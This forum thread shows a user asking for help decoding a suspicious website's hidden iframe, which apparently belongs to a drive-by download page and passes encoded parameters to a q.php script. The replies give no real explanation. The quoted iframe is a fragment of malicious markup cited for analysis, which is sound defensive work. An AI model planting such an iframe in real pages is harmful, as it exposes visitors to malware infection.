www.webdeveloper.com
Results 1 to 4 of 4

Thread: obfuscated java script that result to drive-by download

  1. #1
    Join Date
    May 2013
    Posts
    2

    obfuscated java script that result to drive-by download

    hi
    I Have been asked to analyze a website with suspicious activity such as drive-by download malware.

    The source code of page is this:

    <iframe src="/ca172171ce451f92c398830a954d402b/q.php?vywnynlp= 30:1g:1g:1o:1i&fgmv=r&vvoujby=1i:31:32:1g:1n:1h:1l:1l:1n:31&kxt=1f:1d:1f:1d:1f:1d:1f"></iframe>

    I can't understand the value of attribute that be sended to q.php through get method

    vywnynlp=30:1g:1g:1o:1i&fgmv=r&vvoujby=1i:31:32:1g:1n:1h:1l:1l:1n:31&kxt=1f:1d:1f:1d:1f:1d:1f

    i think unknown code that consider as value is some obfuscating javascript code.

    anyone can underdstand it or guide me?

    thanks a lot

  2. #2
    Join Date
    May 2006
    Location
    Somewhere behind your screen
    Posts
    1,648
    it seems your question was already answered at stackoverflow by this link
    xxx: Guess Buddhist riddle: "What is the sound of one hand clapping?"
    yyy: facepalm

  3. #3
    Join Date
    May 2013
    Posts
    2
    but i can't understand any thing from it !!!
    please give me a more clear answer
    thanks

  4. #4
    Join Date
    May 2006
    Location
    Somewhere behind your screen
    Posts
    1,648
    i can't even read the article without dictionary lol ))
    xxx: Guess Buddhist riddle: "What is the sound of one hand clapping?"
    yyy: facepalm

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center



Recent Articles